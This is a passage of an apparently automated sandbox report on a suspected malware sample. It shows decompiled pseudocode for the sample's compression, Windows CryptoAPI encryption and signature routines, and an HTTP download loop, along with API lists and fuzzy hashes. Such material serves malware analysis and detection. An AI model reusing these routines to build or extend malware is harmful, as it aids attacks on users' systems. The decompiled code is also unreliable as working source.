													 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
												} while ( *(_t417 + 0x44) >= 8);
												goto L79;
											} else {
												goto L71;
											}
											do {
												L71:
												_t375 =  *((intOrPtr*)(_t417 + 0x30));
												if(_t375 <  *((intOrPtr*)(_t417 + 0x34))) {
													 *_t375 =  *(_t417 + 0x48);
													 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
												}
												 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
												 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
											} while ( *(_t417 + 0x44) >= 8);
											goto L74;
										}
										if(_t370 == 0) {
											L38:
											if(( *(_t417 + 8) & 0x00001000) == 0) {
												goto L84;
											}
											_t404 =  *(_t417 + 0x18);
											do {
												_t376 =  *(_t417 + 0x44);
												 *(_t417 + 0x48) =  *(_t417 + 0x48) | _t404 >> 0x00000018 << _t376;
												_t113 = _t376 + 8; // 0x10
												_t315 = _t113;
												 *(_t417 + 0x44) = _t315;
												if(_t315 < 8) {
													goto L44;
												} else {
													goto L41;
												}
												do {
													L41:
													_t377 =  *((intOrPtr*)(_t417 + 0x30));
													if(_t377 <  *((intOrPtr*)(_t417 + 0x34))) {
														 *_t377 =  *(_t417 + 0x48);
														 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
													}
													 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
													 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
												} while ( *(_t417 + 0x44) >= 8);
												L44:
												_t404 = _t404 << 8;
												_t415 = _t415 - 1;
											} while (_t415 != 0);
											goto L84;
										}
										 *(_t417 + 0x44) = 8;
										 *(_t417 + 0x48) =  *(_t417 + 0x48) | 0 << _t370;
										do {
											_t378 =  *((intOrPtr*)(_t417 + 0x30));
											if(_t378 <  *((intOrPtr*)(_t417 + 0x34))) {
												 *_t378 =  *(_t417 + 0x48);
												 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
											}
											 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
											 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
										} while ( *(_t417 + 0x44) >= 8);
										goto L38;
									}
									 *((intOrPtr*)(_t417 + 0x30)) = _t411;
									_t130 =  &_v8; // 0x40473a
									 *(_t417 + 0x48) = 0 << _t358 |  *_t130;
									_t324 = _t358 + 2;
									_t416 = 8;
									 *(_t417 + 0x44) = _t324;
									if(_t324 < _t416) {
										L52:
										_t382 =  *(_t417 + 0x44);
										if(_t382 == 0) {
											L57:
											_t359 = 2;
											_t406 = _t359;
											do {
												_t383 =  *(_t417 + 0x44);
												 *(_t417 + 0x48) =  *(_t417 + 0x48) | ( *(_t417 + 0x3c) & 0x0000ffff) << _t383;
												_t162 = _t383 + 0x10; // 0x108
												_t327 = _t162;
												 *(_t417 + 0x44) = _t327;
												if(_t327 < _t416) {
													goto L62;
												} else {
													goto L59;
												}
												do {
													L59:
													_t386 =  *((intOrPtr*)(_t417 + 0x30));
													if(_t386 <  *((intOrPtr*)(_t417 + 0x34))) {
														 *_t386 =  *(_t417 + 0x48);
														 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
													}
													 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
													 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
												} while ( *(_t417 + 0x44) >= _t416);
												L62:
												 *(_t417 + 0x3c) =  *(_t417 + 0x3c) ^ 0x0000ffff;
												_t406 = _t406 - 1;
											} while (_t406 != 0);
											if( *(_t417 + 0x3c) <= _t406) {
												goto L31;
											} else {
												goto L64;
											}
											do {
												L64:
												_t384 =  *(_t417 + 0x44);
												 *(_t417 + 0x48) =  *(_t417 + 0x48) | ( *(( *((intOrPtr*)(_t417 + 0x40)) + _t406 & 0x00007fff) + _t417 + 0x90) & 0x000000ff) << _t384;
												_t183 = _t384 + 8; // 0x100
												_t333 = _t183;
												 *(_t417 + 0x44) = _t333;
												if(_t333 < _t416) {
													goto L68;
												} else {
													goto L65;
												}
												do {
													L65:
													_t385 =  *((intOrPtr*)(_t417 + 0x30));
													if(_t385 <  *((intOrPtr*)(_t417 + 0x34))) {
														 *_t385 =  *(_t417 + 0x48);
														 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
													}
													 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
													 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
												} while ( *(_t417 + 0x44) >= _t416);
												L68:
												_t406 = _t406 + 1;
											} while (_t406 <  *(_t417 + 0x3c));
											goto L31;
										}
										 *(_t417 + 0x44) = _t416;
										 *(_t417 + 0x48) =  *(_t417 + 0x48) | 0 << _t382;
										do {
											_t387 =  *((intOrPtr*)(_t417 + 0x30));
											if(_t387 <  *((intOrPtr*)(_t417 + 0x34))) {
												 *_t387 =  *(_t417 + 0x48);
												 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
											}
											 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
											 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
										} while ( *(_t417 + 0x44) >= _t416);
										goto L57;
									} else {
										goto L49;
									}
									do {
										L49:
										_t388 =  *((intOrPtr*)(_t417 + 0x30));
										if(_t388 <  *((intOrPtr*)(_t417 + 0x34))) {
											 *_t388 =  *(_t417 + 0x48);
											 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
										}
										 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
										 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
									} while ( *(_t417 + 0x44) >= _t416);
									goto L52;
								}
								if(( *(_t417 + 8) & 0x00040000) != 0 ||  *(_t417 + 0x3c) < 0x30) {
									_t400 = 1;
								}
								_t401 = E0040378E(_t417, _t400);
								if( *(_t417 + 0x3c) == 0 ||  *((intOrPtr*)(_t417 + 0x30)) - _t411 + 1 <  *(_t417 + 0x3c)) {
									goto L28;
								} else {
									goto L47;
								}
							} else {
								goto L19;
							}
							do {
								L19:
								_t393 =  *((intOrPtr*)(_t417 + 0x30));
								if(_t393 <  *((intOrPtr*)(_t417 + 0x34))) {
									 *_t393 =  *(_t417 + 0x48);
									 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
								}
								 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
								 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
							} while ( *(_t417 + 0x44) >= _t410);
							goto L22;
						} else {
							_t394 =  *(_t417 + 0x44);
							_t342 = 0x78;
							 *(_t417 + 0x48) =  *(_t417 + 0x48) | _t342 << _t394;
							_t344 = _t394 + 8;
							 *(_t417 + 0x44) = _t344;
							if(_t344 < _t410) {
								L14:
								_t395 =  *(_t417 + 0x44);
								 *(_t417 + 0x48) =  *(_t417 + 0x48) | 1 << _t395;
								_t47 = _t395 + 8; // 0x100
								_t348 = _t47;
								 *(_t417 + 0x44) = _t348;
								if(_t348 < _t410) {
									goto L18;
								} else {
									goto L15;
								}
								do {
									L15:
									_t396 =  *((intOrPtr*)(_t417 + 0x30));
									if(_t396 <  *((intOrPtr*)(_t417 + 0x34))) {
										 *_t396 =  *(_t417 + 0x48);
										 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
									}
									 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
									 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
								} while ( *(_t417 + 0x44) >= _t410);
								goto L18;
							} else {
								goto L11;
							}
							do {
								L11:
								_t397 =  *((intOrPtr*)(_t417 + 0x30));
								if(_t397 <  *((intOrPtr*)(_t417 + 0x34))) {
									 *_t397 =  *(_t417 + 0x48);
									 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
								}
								 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
								 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
							} while ( *(_t417 + 0x44) >= _t410);
							goto L14;
						}
					}
				}
			}































































                  0x004037b1
                  0x004037b3
                  0x004037b8
                  0x004037bb
                  0x004037c5
                  0x004037d7
                  0x004037d2
                  0x004037d4
                  0x004037d4
                  0x004037db
                  0x004037f8
                  0x004037f8
                  0x00000000
                  0x004037dd
                  0x004037e0
                  0x004037ef
                  0x00000000
                  0x004037f1
                  0x004037f4
                  0x004037fe
                  0x00403801
                  0x00403804
                  0x0040380c
                  0x00403812
                  0x00403815
                  0x0040381a
                  0x0040381e
                  0x00403825
                  0x0040382f
                  0x0040389b
                  0x0040389b
                  0x004038a8
                  0x004038ab
                  0x004038ab
                  0x004038ae
                  0x004038b3
                  0x004038d2
                  0x004038d5
                  0x004038d8
                  0x004038db
                  0x004038e0
                  0x004039cb
                  0x004039ce
                  0x004039d7
                  0x00403916
                  0x00403918
                  0x0040391a
                  0x0040391e
                  0x00403923
                  0x00403926
                  0x00403929
                  0x00403929
                  0x00403930
                  0x00403931
                  0x00403931
                  0x00403936
                  0x00403b7d
                  0x00403b8c
                  0x00403b9c
                  0x00403ba8
                  0x00403baf
                  0x00403bbb
                  0x00403bc1
                  0x00403bc4
                  0x00403bc7
                  0x00403bca
                  0x00403bd0
                  0x00403bd2
                  0x00403c48
                  0x00000000
                  0x00403c48
                  0x00403bd7
                  0x00403c03
                  0x00403c0b
                  0x00403c42
                  0x00403c0d
                  0x00403c10
                  0x00403c1f
                  0x00403c27
                  0x00403c2d
                  0x00403c36
                  0x00403c38
                  0x00403c3a
                  0x00403c3d
                  0x00403c3d
                  0x00403c38
                  0x00000000
                  0x00403c0b
                  0x00403be5
                  0x00403bf2
                  0x00403bf9
                  0x00000000
                  0x00000000
                  0x00403bfb
                  0x00403bfe
                  0x00000000
                  0x00403bfe
                  0x0040393c
                  0x00403941
                  0x00403944
                  0x00403add
                  0x00403ae1
                  0x00403ae4
                  0x00403ae7
                  0x00403aed
                  0x00403b0d
                  0x00403b0d
                  0x00403b12
                  0x00403b40
                  0x00403b40
                  0x00403b40
                  0x00403b48
                  0x00403b4b
                  0x00403b4b
                  0x00403b4e
                  0x00403b54
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00403b56
                  0x00403b56
                  0x00403b56
                  0x00403b5c
                  0x00403b61
                  0x00403b63
                  0x00403b63
                  0x00403b66
                  0x00403b6a
                  0x00403b6e
                  0x00403b74
                  0x00403b74
                  0x00403b7a
                  0x00403b7a
                  0x00000000
                  0x00403b40
                  0x00403b16
                  0x00403b1f
                  0x00403b22
                  0x00403b22
                  0x00403b28
                  0x00403b2d
                  0x00403b2f
                  0x00403b2f
                  0x00403b32
                  0x00403b36
                  0x00403b3a
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00403aef
                  0x00403aef
                  0x00403aef
                  0x00403af5
                  0x00403afa
                  0x00403afc
                  0x00403afc
                  0x00403aff
                  0x00403b03
                  0x00403b07
                  0x00000000
                  0x00403aef
                  0x0040394c
                  0x0040397a
                  0x00403981
                  0x00000000
                  0x00000000
                  0x00403987
                  0x0040398a
                  0x0040398a
                  0x00403994
                  0x00403997
                  0x00403997
                  0x0040399a
                  0x004039a0
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004039a2
                  0x004039a2
                  0x004039a2
                  0x004039a8
                  0x004039ad
                  0x004039af
                  0x004039af
                  0x004039b2
                  0x004039b6
                  0x004039ba
                  0x004039c0
                  0x004039c0
                  0x004039c3
                  0x004039c3
                  0x00000000
                  0x004039c6
                  0x00403950
                  0x00403959
                  0x0040395c
                  0x0040395c
                  0x00403962
                  0x00403967
                  0x00403969
                  0x00403969
                  0x0040396c
                  0x00403970
                  0x00403974
                  0x00000000
                  0x0040395c
                  0x004039df
                  0x004039e6
                  0x004039eb
                  0x004039ee
                  0x004039f1
                  0x004039f2
                  0x004039f7
                  0x00403a16
                  0x00403a16
                  0x00403a1b
                  0x00403a44
                  0x00403a46
                  0x00403a47
                  0x00403a49
                  0x00403a49
                  0x00403a52
                  0x00403a55
                  0x00403a55
                  0x00403a58
                  0x00403a5d
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00403a5f
                  0x00403a5f
                  0x00403a5f
                  0x00403a65
                  0x00403a6a
                  0x00403a6c
                  0x00403a6c
                  0x00403a6f
                  0x00403a73
                  0x00403a77
                  0x00403a7c
                  0x00403a7c
                  0x00403a83
                  0x00403a83
                  0x00403a89
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00403a8f
                  0x00403a8f
                  0x00403a92
                  0x00403aa6
                  0x00403aa9
                  0x00403aa9
                  0x00403aac
                  0x00403ab1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00403ab3
                  0x00403ab3
                  0x00403ab3
                  0x00403ab9
                  0x00403abe
                  0x00403ac0
                  0x00403ac0
                  0x00403ac3
                  0x00403ac7
                  0x00403acb
                  0x00403ad0
                  0x00403ad0
                  0x00403ad1
                  0x00000000
                  0x00403ad6
                  0x00403a1f
                  0x00403a24
                  0x00403a27
                  0x00403a27
                  0x00403a2d
                  0x00403a32
                  0x00403a34
                  0x00403a34
                  0x00403a37
                  0x00403a3b
                  0x00403a3f
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004039f9
                  0x004039f9
                  0x004039f9
                  0x004039ff
                  0x00403a04
                  0x00403a06
                  0x00403a06
                  0x00403a09
                  0x00403a0d
                  0x00403a11
                  0x00000000
                  0x004039f9
                  0x004038ed
                  0x004038f7
                  0x004038f7
                  0x00403903
                  0x00403905
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004038b5
                  0x004038b5
                  0x004038b5
                  0x004038bb
                  0x004038c0
                  0x004038c2
                  0x004038c2
                  0x004038c5
                  0x004038c9
                  0x004038cd
                  0x00000000
                  0x00403837
                  0x00403837
                  0x0040383c
                  0x0040383f
                  0x00403842
                  0x00403845
                  0x0040384a
                  0x00403869
                  0x00403869
                  0x00403871
                  0x00403874
                  0x00403874
                  0x00403877
                  0x0040387c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040387e
                  0x0040387e
                  0x0040387e
                  0x00403884
                  0x00403889
                  0x0040388b
                  0x0040388b
                  0x0040388e
                  0x00403892
                  0x00403896
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040384c
                  0x0040384c
                  0x0040384c
                  0x00403852
                  0x00403857
                  0x00403859
                  0x00403859
                  0x0040385c
                  0x00403860
                  0x00403864
                  0x00000000
                  0x0040384c
                  0x0040382f
                  0x004037ef

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: memset$memcpy
                  • String ID: 0HCw$:G@
                  • API String ID: 368790112-2591896426
                  • Opcode ID: 3df911d3bb229b9e5b5053eb572e8c057e61aac1366dbd8753bf5e6acc202186
                  • Instruction ID: bff9ad06bf82d853f9c70daa61a207c77b125d2d5e3c741b47fcf7fead7e8f56
                  • Opcode Fuzzy Hash: 3df911d3bb229b9e5b5053eb572e8c057e61aac1366dbd8753bf5e6acc202186
                  • Instruction Fuzzy Hash: 20023171601B108FC776CF29C680523BBF5BF55B227604A2EC6E796E91D23AF941CB08
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040215A, Relevance: 6.1, APIs: 4, Instructions: 89encryptionCOMMON
                  Download Yara Rule
                  C-Code - Quality: 28%
                  			E0040215A(void* __ecx, intOrPtr* __edx, BYTE** _a4) {
				long* _v8;
				intOrPtr* _v12;
				intOrPtr _t17;
				void* _t20;
				BYTE* _t21;
				void* _t33;
				BYTE** _t35;
				void* _t51;
				BYTE* _t54;
				DWORD* _t56;

				_push(__ecx);
				_push(__ecx);
				_v12 = __edx;
				_t17 =  *((intOrPtr*)(__edx + 4));
				_t51 = 0;
				_t54 = _t17 - 0x74;
				if(_t17 >= 0x74) {
					_t19 =  !=  ? (_t54 & 0xfffffff0) + 0x10 : _t54;
					__eflags = _t54 - ( !=  ? (_t54 & 0xfffffff0) + 0x10 : _t54);
					if(_t54 != ( !=  ? (_t54 & 0xfffffff0) + 0x10 : _t54)) {
						goto L1;
					} else {
						_t35 = _a4;
						_t35[1] = _t54;
						_t21 = E004014F2(_t54);
						 *_t35 = _t21;
						if(_t21 != 0) {
							_v12 =  *_v12;
							_push( &_v8);
							_push(0);
							_push(0);
							_push( *0x41651c);
							if( *0x4133b4() == 0) {
								_t15 =  &(_t35[1]); // 0x406220
								_t56 = _t15;
								goto L10;
							} else {
								E0040151F( *_t35, _v12 + 0x74, _t54);
								_t10 =  &(_t35[1]); // 0x406220
								_t56 = _t10;
								if(CryptDecrypt( *0x416518, _v8, 1, 0,  *_t35, _t56) != 0) {
									 *0x412f04(_v8, _v12, 0x60,  *0x416514, 0, 0);
									_t33 = 1;
									_t51 =  !=  ? _t33 : 0;
								}
								 *0x413608(_v8);
								if(_t51 == 0) {
									L10:
									E00401532( *_t35);
									 *_t35 =  *_t35 & 0x00000000;
									 *_t56 =  *_t56 & 0x00000000;
								}
							}
						}
						_t20 = _t51;
					}
				} else {
					L1:
					_t20 = 0;
				}
				return _t20;
			}













                  0x0040215d
                  0x0040215e
                  0x00402162
                  0x00402166
                  0x00402169
                  0x0040216b
                  0x00402171
                  0x00402189
                  0x0040218c
                  0x0040218e
                  0x00000000
                  0x00402190
                  0x00402191
                  0x00402196
                  0x00402199
                  0x0040219e
                  0x004021a2
                  0x004021ad
                  0x004021b3
                  0x004021b4
                  0x004021b6
                  0x004021b8
                  0x004021c6
                  0x00402225
                  0x00402225
                  0x00000000
                  0x004021c8
                  0x004021d1
                  0x004021d7
                  0x004021d7
                  0x004021f4
                  0x00402208
                  0x00402212
                  0x00402213
                  0x00402213
                  0x00402219
                  0x00402221
                  0x00402228
                  0x0040222a
                  0x0040222f
                  0x00402232
                  0x00402232
                  0x00402221
                  0x004021c6
                  0x00402235
                  0x00402237
                  0x00402173
                  0x00402173
                  0x00402173
                  0x00402173
                  0x0040223d

                  APIs
                  • CryptDuplicateHash.ADVAPI32(00000000,00000000,0040C894,00000104,0040C6FC,00000000,?,?,?,0040621C,0040C894), ref: 004021BE
                  • CryptDecrypt.ADVAPI32(0040C894,00000001,00000000,0040621C,00406220,?,?,?,0040621C,0040C894), ref: 004021EC
                  • CryptVerifySignatureW.ADVAPI32(0040C894,0040621C,00000060,00000000,00000000,?,?,?,0040621C,0040C894), ref: 00402208
                  • CryptDestroyHash.ADVAPI32(0040C894,?,?,?,0040621C,0040C894), ref: 00402219
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: Crypt$Hash$DecryptDestroyDuplicateSignatureVerify
                  • String ID:
                  • API String ID: 1014757615-0
                  • Opcode ID: 09569594b61da52c59d40f425788a8422af23cb8887ee059169b09b77780c7a0
                  • Instruction ID: 04f31bdf2388faa97c57a2fd3933937c900cc02f324019b7ba81707c3369ae23
                  • Opcode Fuzzy Hash: 09569594b61da52c59d40f425788a8422af23cb8887ee059169b09b77780c7a0
                  • Instruction Fuzzy Hash: A3318C31700110BFDB118F64DD44BAA7BBAEF88711F1040AAF901EB2E4DBB1AE019A59
                  Uniqueness

                  Uniqueness Score: 0.53%

                  Function 0040207B, Relevance: 4.6, APIs: 3, Instructions: 85encryptionCOMMON
                  Download Yara Rule
                  C-Code - Quality: 21%
                  			E0040207B(intOrPtr* __edx, signed int* _a4) {
				intOrPtr _v8;
				intOrPtr* _v12;
				char _v16;
				signed int _v20;
				char _t26;
				signed int _t27;
				void* _t39;
				void* _t41;
				signed int _t42;
				intOrPtr _t49;
				intOrPtr _t56;
				signed int* _t58;
				void* _t59;

				_v12 = __edx;
				_t26 =  *((intOrPtr*)(__edx + 4));
				_t42 = _t26 + 1;
				if((_t42 & 0x0000000f) != 0) {
					_t42 = (_t42 & 0xfffffff0) + 0x10;
				}
				_t58 = _a4;
				_v16 = _t26;
				_t59 = 0;
				_t58[1] = _t42 + 0x74;
				_t27 = E004014F2(_t42 + 0x74);
				_v20 = _t27;
				 *_t58 = _t27;
				if(_t27 == 0) {
					L9:
					return _t59;
				} else {
					_v8 = _t27 + 0x74;
					_push( &_a4);
					_push(0);
					_push(0);
					_push( *0x41651c);
					if( *0x4133b4() == 0) {
						L8:
						E00401532( *_t58);
						 *_t58 =  *_t58 & 0x00000000;
						_t58[1] = _t58[1] & 0x00000000;
						goto L9;
					}
					E0040151F(_v8,  *_v12,  *((intOrPtr*)(_v12 + 4)));
					_push(_t42);
					_push( &_v16);
					_push(_v8);
					_push(0);
					_push(1);
					_push(_a4);
					_push( *0x416518);
					if( *0x413124() != 0) {
						_t43 = _v20;
						_t56 =  *0x416518; // 0x2397f8
						_t49 =  *0x416514; // 0x2396a0
						_t39 = E00401F11(_t49, _t56, _v20);
						_pop(_t50);
						if(_t39 != 0) {
							E00401F56(_a4, _t43 + 0x60);
							_t41 = 1;
							_t59 =  !=  ? _t41 : 0;
						}
					}
					 *0x413608(_a4);
					if(_t59 != 0) {
						goto L9;
					} else {
						goto L8;
					}
				}
			}
















                  0x00402083
                  0x00402088
                  0x0040208c
                  0x00402092
                  0x00402097
                  0x00402097
                  0x0040209a
                  0x004020a0
                  0x004020a3
                  0x004020a5
                  0x004020a8
                  0x004020ad
                  0x004020b0
                  0x004020b4
                  0x00402152
                  0x00402159
                  0x004020ba
                  0x004020bd
                  0x004020c3
                  0x004020c4
                  0x004020c5
                  0x004020c6
                  0x004020d4
                  0x00402143
                  0x00402145
                  0x0040214a
                  0x0040214d
                  0x00000000
                  0x0040214d
                  0x004020e1
                  0x004020e7
                  0x004020eb
                  0x004020ec
                  0x004020f1
                  0x004020f3
                  0x004020f4
                  0x004020f7
                  0x00402105
                  0x00402107
                  0x0040210a
                  0x00402110
                  0x00402117
                  0x0040211c
                  0x0040211f
                  0x00402128
                  0x00402132
                  0x00402133
                  0x00402133
                  0x0040211f
                  0x00402139
                  0x00402141
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00402141

                  APIs
                  • CryptDuplicateHash.ADVAPI32(00000000,00000000,00000000,0040C6FC,00000000,00000104,0040616B,?,00000000,000CD140), ref: 004020CC
                  • CryptEncrypt.ADVAPI32(?,00000001,00000000,?,?,?), ref: 004020FD
                  • CryptDestroyHash.ADVAPI32(?), ref: 00402139
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: Crypt$Hash$DestroyDuplicateEncrypt
                  • String ID:
                  • API String ID: 1128268866-0
                  • Opcode ID: 4e59cee7960c38e8b5ee7e5856dafefdb3e81cdfc3becf9d1b757b82fba9955f
                  • Instruction ID: e215d4e7104d4b47444e5095201a7053bbba18aa046f11bf0f453833bd48b0d0
                  • Opcode Fuzzy Hash: 4e59cee7960c38e8b5ee7e5856dafefdb3e81cdfc3becf9d1b757b82fba9955f
                  • Instruction Fuzzy Hash: 3E21A271A00206BFDB10DF64DD44AAABBB9FF04354B10817AE905DB2A1EB74DE40CB94
                  Uniqueness

                  Uniqueness Score: 0.65%

                  Function 00401F11, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33encryptionCOMMON
                  Download Yara Rule
                  APIs
                  • CryptExportKey.ADVAPI32(002397F8,002396A0,00000001,00000040,?,?,00000000), ref: 00401F2F
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: CryptExport
                  • String ID: l
                  • API String ID: 3389274496-2517025534
                  • Opcode ID: 3ca03c0b0af9f491b2816fad542ac85e238e487dba8f6d51c2e98b0d322ebe00
                  • Instruction ID: 8de1b0b566f387a962e970ad356d4eae64fe2c0c17b5e81973823825b819e613
                  • Opcode Fuzzy Hash: 3ca03c0b0af9f491b2816fad542ac85e238e487dba8f6d51c2e98b0d322ebe00
                  • Instruction Fuzzy Hash: 83F02730900218ABDB10DF64CC44EFEBBBDDB05B44F1001AAED05E7280E6709E0487E4
                  Uniqueness

                  Uniqueness Score: 0.02%

                  Function 00401383, Relevance: 1.6, APIs: 1, Instructions: 60filenetworkCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00401383(void* __ecx, intOrPtr* __edx, void* __eflags) {
				long _v8;
				long _v12;
				void* _v16;
				intOrPtr* _v20;
				long _t15;
				int _t18;
				long _t24;
				intOrPtr* _t28;
				void* _t30;
				void* _t32;
				long _t34;

				_v20 = __edx;
				_t30 = 5;
				_v16 = __ecx;
				_t15 = E00401316(__ecx, _t30);
				_t34 = 0;
				_t24 = _t15;
				_v12 = 0;
				if(_t24 != 0) {
					_t32 = E004014F2(_t24);
					if(_t32 == 0) {
						_t18 = 0;
						L10:
						return _t18;
					}
					_v8 = 0;
					if(_t24 == 0) {
						L7:
						E00401532(_t32);
						_t18 = _v12;
						if(_t18 == 0) {
							goto L10;
						}
						L8:
						_t28 = _v20;
						 *_t28 = _t32;
						 *((intOrPtr*)(_t28 + 4)) = _t34;
						goto L10;
					} else {
						goto L3;
					}
					while(1) {
						L3:
						_t18 = InternetReadFile(_v16, _t32 + _t34, _t24 - _t34,  &_v8);
						_v12 = _t18;
						if(_t18 == 0) {
							goto L7;
						}
						if(_v8 == 0) {
							goto L8;
						}
						_t34 = _t34 + _v8;
						if(_t34 < _t24) {
							continue;
						}
						goto L8;
					}
					goto L7;
				}
				return 0;
			}














                  0x0040138b
                  0x00401392
                  0x00401393
                  0x00401396
                  0x0040139b
                  0x0040139d
                  0x004013a1
                  0x004013a6
                  0x004013b0
                  0x004013b4
                  0x00401401
                  0x00401403
                  0x00000000
                  0x00401403
                  0x004013b6
                  0x004013bb
                  0x004013e9
                  0x004013eb
                  0x004013f0
                  0x004013f5
                  0x00000000
                  0x00000000
                  0x004013f7
                  0x004013f7
                  0x004013fa
                  0x004013fc
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004013bd
                  0x004013bd
                  0x004013cd
                  0x004013d3
                  0x004013d8
                  0x00000000
                  0x00000000
                  0x004013de
                  0x00000000
                  0x00000000
                  0x004013e0
                  0x004013e5
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004013e7
                  0x00000000
                  0x004013bd
                  0x00401409

                  APIs
                    • Part of subcall function 00401316: HttpQueryInfoW.WININET(00000000,00000013,00000000,00000000,00000000), ref: 00401334
                    • Part of subcall function 004014F2: GetProcessHeap.KERNEL32(00000008,004129A0,00401A84,?,00000000,00000104,?,?,0040F0B9), ref: 004014F5
                    • Part of subcall function 004014F2: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 004014FC
                  • InternetReadFile.WININET(?,00000000,00000000,?), ref: 004013CD
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateFileHttpInfoInternetProcessQueryRead
                  • String ID:
                  • API String ID: 561080696-0
                  • Opcode ID: 7ff914bd12d0651914ed9571272a890d1b1ecacf876fd1c2157c33efa916e31d
                  • Instruction ID: 451bea8f2ca32b148c1c73ffebc7c3b8197519079505de83237b7c8d80f81208
                  • Opcode Fuzzy Hash: 7ff914bd12d0651914ed9571272a890d1b1ecacf876fd1c2157c33efa916e31d
                  • Instruction Fuzzy Hash: 67117371B00215ABDB119E9E9980AAEFBF8AF44704B14417FE904F33A1D7B5DD019B94
                  Uniqueness

                  Uniqueness Score: 0.04%

                  Function 00401F56, Relevance: 1.5, APIs: 1, Instructions: 14encryptionCOMMON
                  Download Yara Rule
                  APIs
                  • CryptGetHashParam.ADVAPI32(?,00000002,?,00000000), ref: 00401F6B
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: CryptHashParam
                  • String ID:
                  • API String ID: 1839025277-0
                  • Opcode ID: 496b6ce24351a1596fbace5237037a10789b3b74501e142722ab8e206ca54b84
                  • Instruction ID: ea0d1c88b8beea22a5d58a2278bf81109cad106d3917202b53e93bae8ff64b58
                  • Opcode Fuzzy Hash: 496b6ce24351a1596fbace5237037a10789b3b74501e142722ab8e206ca54b84
